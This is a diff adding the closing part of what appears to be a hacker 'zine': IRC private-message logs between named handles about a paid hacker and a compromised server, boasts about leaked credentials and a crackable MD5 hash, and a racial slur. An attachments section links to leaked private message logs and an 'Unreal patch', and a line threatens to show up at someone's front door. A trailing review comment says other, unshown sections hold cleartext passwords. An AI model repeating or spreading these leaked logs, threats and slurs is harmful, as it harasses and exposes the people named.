bigtime +█ bongrip PRIVMSG MLT :to hack us +█ bongrip PRIVMSG MLT :like someone above el8's head +█ bongrip PRIVMSG MLT :above green +█ bongrip PRIVMSG MLT :etc +█ bongrip PRIVMSG MLT :i dont even know the guys name cause he aliases so +█ much +█ +█ Actually, we taking this job for free. Is a public service. +█ +█ MLT PRIVMSG bongrip :then who +█ bongrip PRIVMSG MLT :positive +█ bongrip PRIVMSG MLT :he said hes better than green +█ bongrip PRIVMSG MLT :and knows assembly and other shit +█ MLT PRIVMSG bongrip :does he have an alias? +█ bongrip PRIVMSG MLT :he has tons of aliases +█ bongrip PRIVMSG MLT :hes a ghost +█ bongrip PRIVMSG MLT :hes just an undergrounder +█ MLT PRIVMSG bongrip :no common or frequent ones? +█ bongrip PRIVMSG MLT :everyone knows who he is +█ bongrip PRIVMSG MLT :but dont really know what to calll him +█ bongrip PRIVMSG MLT :cause hes got a new nick +█ bongrip PRIVMSG MLT :all the time +█ bongrip PRIVMSG MLT :i think hes talking about +█ bongrip PRIVMSG MLT :the official +█ bongrip PRIVMSG MLT :root +█ bongrip PRIVMSG MLT :like the one they allll call +█ bongrip PRIVMSG MLT :root +█ bongrip PRIVMSG MLT :el8 there was this guy they called root +█ bongrip PRIVMSG MLT :that was above all of them +█ MLT PRIVMSG bongrip :ah +█ bongrip PRIVMSG MLT :and wasnt el8 +█ bongrip PRIVMSG MLT :he was for hire +█ bongrip PRIVMSG MLT :so someone apparently has gotten this guy +█ bongrip PRIVMSG MLT :some money +█ bongrip PRIVMSG MLT :to do shit to us +█ bongrip PRIVMSG MLT :so like +█ bongrip PRIVMSG MLT :dont tcpdump +█ +█ anyway, yall suck cock. stop posturing as real old school +█ hackers. it's getting old. especially people like MLT who go +█ "I KNOW AC1DB1TCH3Z!!!!" for attn. yall niggas dunno shit. 
+█ +█ <@YogSotho> In my experience, russians are 31337 +█ +█ he told me he had the box completely locked down and that everything +█ was secured +█ lola said he had the box secured +█ +█ kinda makes ya feel like a user/pass mighta been dropped +█ by lola +█ via a btc +█ or 2 +█ np +█ +█ MLT: it was passed on credentials +█ scraped some shit and found it, sxcurity :\ +█ they didnt hack anything +█ sxcurity gave them his sudoers account +█ they got mine out of there and the rest is just... +█ i mean lol +█ weakest unix bowlers +█ u know what +█ im not even gonna change something +█ im gonna leave it as is with them having access to lolas box +█ if they can crack that weak ass md5 hash +█ and oper up on my accnt +█ ill give it to ya +█ bongrip I did what? +█ @ bongrip ? +█ +█ @ret2libc: Well we just had a lengthly convo with green about how you and +█ some others from 2600 paid him $$$ to try own us. Damn you must +█ be desperate. +█ +█ and green +█ lol +█ rip +█ to him +█ and his entire future +█ +█ r u actually zf0 +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x09 Attachments ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ [+] PM logs +█ https://mega.nz/#!gSoxFYjB!WSi7Fj2WPbN-MoGVv48qb7cY1AaiCvOtBnQTcWpy2Ac +█ [+] Unreal patch +█ https://mega.nz/#!wCIQ2bgY!67spwHp9nd1g6sbUbuWUcxplcrIYtSOzo5lfd9QTuYs +█ +█ spread my pm's again and aush0k+kms+zeekill+me at your front door +█ +███████████████████████████████████████████████████████████████████████████████ +█████████░ +██▀▀▀▀▀█▀ +█ ▄█▀█▄ ▄███▄ ▐█ ▐█▌▐████▌ ▄██▄ ▄█▀█▄ ▐████▌ +█ ██ ██ ██ ██ ▐██▐█▌ ██ ████ ██ ██ ██ +█ ██ ██ ██ ▐████▌ ██ ▐██▐█▌ ██ ██ +█ ██ ██ ██ ██ ▐█▌██▌ ██ ▐█████ ██ ██ ██ +█ ▀█▄█▀ ▀███▀ ▐█▌ █▌ ██ ██▌ ██ ▀█▄█▀ ██ +██▄▄▄▄▄█▄ +█████████ +█████████ Please contact us directly through the FSB +█████████ +█████████ +███▀▀▀▀▐▀ +██ ▄█▀█▄ ████▄ ▄███ ▄███▐████▌██ ▐█ ▐█▌ ▄█▀█▄ ▄███ +█▌▐██ ██ ██▌██▌██ ██ ██ ██ 
▐██▐█▌▐██ ██ ██▄▄▄ +█▌▐█▌▄▄▄ ████▀ ███ ███ ██ ██ ▐████▌▐█▌▄▄▄ ▄▄ ██ +█▌▐█▌ ██ ██▌██ ██ ██ ██ ██ ▐█▌██▌▐█▌ ██ ██ ██ +██ ▀█▄██ ██▌▐█▌▀███ ▀███ ██ ██ ▐█▌ █▌ ▀█▄██ ▀███▀ +███▄▄▄▄▄▄ +█████████ The OFFICIAL root +█████████ Green +█████████ danK +█████████ +█████████ +█████████ +█████████ ░░ +█████████ ░░░░ +█████████ ░░░░░░ +█████████ █▄ ░░░░░░░░ +████████████████████▄ ░░░░░░░░ +██████████████████████▄ ░░░░░░░ +██████████████████████▀ ░░░░░░░ @ MLT: We're borrowing +████████████████████▀ ░░░ ░░░░░░ your verified checkmark to + █▀ ░░░░░░ ░░░░░░ verify the authenticity of + ░░░░░░░░ ░░░░░░ this zine. ;) + ░░░░░░░░ ░░░░░░ + ░░░░░░░░░░░░░ + ░░░░░░░░░░ + ░░░░░░░ \ No newline at end of file
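Review bot: the new file commits cleartext credentials next to the systems they belong to. The 0x07 transcript quotes a sudoer password and a root password together with the host address, and the earlier #insecurity log contains a NickServ `IDENTIFY` string that the following lines show was still valid. Because this is a new-file commit, those values stay in repository history even if a later commit edits them out, so replace them with a marker such as `<redacted>` before this lands. The same goes for the two mega.nz links under 0x09, one of which is labelled as private message logs. Two smaller points: the interpreter session in 0x08 calls `.decode("hex")` on a str, which only works on Python 2, so a line stating the interpreter version would let a reader reproduce the "MD5 equal, SHA-256 different" result; and the hunk ends with `\ No newline at end of file`, so add the trailing newline.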